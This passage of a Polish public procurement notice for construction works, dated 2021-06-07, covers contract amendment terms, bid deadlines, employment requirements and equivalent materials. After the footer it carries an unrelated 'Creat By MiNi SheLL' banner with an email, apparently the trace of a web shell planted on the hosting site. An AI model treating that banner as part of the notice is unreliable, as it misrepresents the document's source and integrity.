okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich<br/>wprowadzenia:1) zmiany ceny w zakresie wysokości stawki podatku VAT, jeżeli zostanie<br/>ogłoszona ustawowa jej zmiana - nie wymaga się sporządzenia aneksu,2) nie stanowi istotnej<br/>zmiany umowy:a) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy<br/>(np. zmiana nr rachunku bankowego),b) zmiany danych teleadresowych, zmiany osób<br/>wskazanych do kontaktów między stronami.3) dopuszczalne są roboty zamienne w zakresie<br/>zmian materiałów, technologii, urządzeń na materiały, technologie i urządzenia spełniające<br/>parametry techniczne i jakościowe lub o wyższych parametrach niż określone w specyfikacji<br/>istotnych warunków zamówienia, dokumentacji technicznej i ofercie Wykonawcy. Uzasadnienie<br/>zmian – prawidłowa realizacja przedmiotu umowy, obniżenie kosztów budowy lub eksploatacji,<br/>zapewnienie optymalnych parametrów technicznych i jakościowych robót. Roboty zamienne<br/>mogą być realizowane wyłącznie po uzyskaniu pisemnej zgody Zamawiającego pod rygorem<br/>nieważności, poprzedzonej uzasadnionym pisemnym zgłoszeniem przez wykonawcę zakresu<br/>robót zamiennych - bez zwiększenia wynagrodzenia.4) zawsze dopuszczalne są zmiany umowy<br/>w rozumieniu art. 455 ust. 1–4 uPzp.- jednakże nie stanowi to obowiązku, z którego Wykonawca<br/>mógłby wnosić roszczenie wobec Zamawiającego.5) dopuszcza się zmiany umowy związane z obowiązującymi przepisami dotyczącymi COVID-19, tj.:a) zmiany umowy o zamówienie<br/>publiczne – w przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID-19,<br/>wpływają na należyte wykonanie tej umowy;b) odstąpienia od potrącania kar umownych<br/>zastrzeżonych na wypadek niewykonania lub nienależytego wykonania umowy z wynagrodzenia<br/>wykonawcy lub z innych jego wierzytelności a także zakaz zaspokojenia tych kar z<br/>zabezpieczenia należytego wykonania umowy - w okresie ogłoszenia stanu zagrożenia<br/>epidemicznego albo stanu epidemii w związku z COVID-19, i przez 90 dni od dnia odwołania<br/>stanu, który obowiązywał jako ostatni, o ile zdarzenie, w związku z którym zastrzeżono tę karę,<br/>nastąpiło w okresie ogłoszenia stanu zagrożenia epidemicznego albo stanu epidemii;jeżeli<br/>przepisy te lub z nimi związane lub zeń wynikające będą obowiązywać w trakcie realizacji<br/>niniejszego zamówienia.3. W sprawach nieuregulowanych umową zastosowanie mają przepisy<br/>Kodeksu Cywilnego oraz Prawa Zamówień Publicznych. Szczegółowe informacje zawarto w<br/>istotnych postanowieniach umowy - Zał. 2 do SWZ. Prosimy o zapoznanie się. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-22 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-22 15:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający na podstawie art. 95 uPzp ustanawia wymóg w zakresie zatrudnienia przez<br/>wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w<br/>zakresie realizacji zamówienia.Wykonawca lub podwykonawca winien do realizacji umowy<br/>skierować zatrudnione w wymiarze pełnego etatu na podstawie umowy o pracę osoby, które<br/>będą wykonywać pracę w sposób kreślony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. –<br/>Kodeks pracy w zakresie czynności: prace fizyczne. Wykonawca lub podwykonawca, najpóźniej<br/>w dniu podpisania umowy w niniejszym przedmiocie, winien złożyć stosownej treści<br/>oświadczenie.Zamawiający zastrzega prawo do weryfikacji sposobu zatrudnienia ww. osób<br/>poprzez wezwanie Wykonawcy lub podwykonawcy do złożenia odpowiednio oświadczenia oraz<br/>poprzez bezpośrednie rozmowy z osobami wykonującymi ww. czynności. W przypadku<br/>wykonywania ww. czynności przez osoby niezatrudnione zgodnie z art. 22 § 1 KP Zamawiający<br/>nałoży kary umowne w wysokości 1500 zł za każdy ujawniony przypadek. W przypadku<br/>stwierdzenia, pomimo wezwania, że osoby wykonujące roboty nie są zatrudnione zgodnie z<br/>SWZ, Zamawiający zastrzega możliwość natychmiastowego rozwiązania umowy z winy<br/>wykonawcy. Szczegółowe zapisy zawarto w projekcie umowy – Zał. nr 2 do SWZ.We wszystkich<br/>przypadkach wskazanych w całej SWZ i załącznikach do SWZ, w których ze względu na<br/>specyfikację przedmiotu zamówienia wskazano pochodzenie, nazwy materiałów, urządzeń lub<br/>ich pochodzenie, dopuszcza się stosowanie materiałów, urządzeń – rozwiązania równoważne, tj.<br/>wszelkie wymienione z nazwy materiały, urządzenia użyte w przekazanej przez Zamawiającego<br/>dokumentacji lub ich pochodzenie, służą wyłącznie określeniu standardu i mogą być zastąpione<br/>innymi o nie gorszych parametrach technicznych, użytkowych, jakościowych, funkcjonalnych<br/>przy uwzględnieniu prawidłowej współpracy z pozostałymi materiałami, urządzeniami,<br/>wskazanymi w OZP. Pojęcie równoważności znajduje również zastosowanie w przypadku, gdy<br/>Zamawiający opisał przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i<br/>systemów odniesienia, czy do konkretnych certyfikatów. Przedstawienie certyfikatów<br/>równoważnych wymaga udowodnienia w ofercie spełniania wymogów wskazanych norm przez rozwiązania równoważne. Użyte w dokumentacji nazwy, które wskazują lub mogłyby kojarzyć<br/>się z producentem lub firmą, nie mają na celu preferowanie rozwiązań danego producenta lecz<br/>wskazanie na rozwiązanie, które powinno posiadać cechy techniczne, technologiczne nie gorsze<br/>od podanych w Specyfikacji technicznej OPZ. Zamawiający w przypadku ofert zawierających<br/>rozwiązania równoważne będzie je weryfikować pod względem spełniania wymogów<br/>poszczególnych pozycji OPZ. Wykonawca obowiązany jest udowodnić w ofercie, iż oferowane<br/>przez niego rozwiązanie spełnia wymagania określone przez zamawiającego w<br/>OZP.Zamawiający nie uzna rozwiązań równoważnych, jeśli będą o gorszych niż wskazane w<br/>Specyfikacji przedmiotu zamówienia OPZ - minimalnych wymaganiach funkcjonalnych,<br/>technicznych i technologicznych, kompatybilności z przedstawionymi w OPZ. Szczegółowe informacje w SWZ.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-07 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com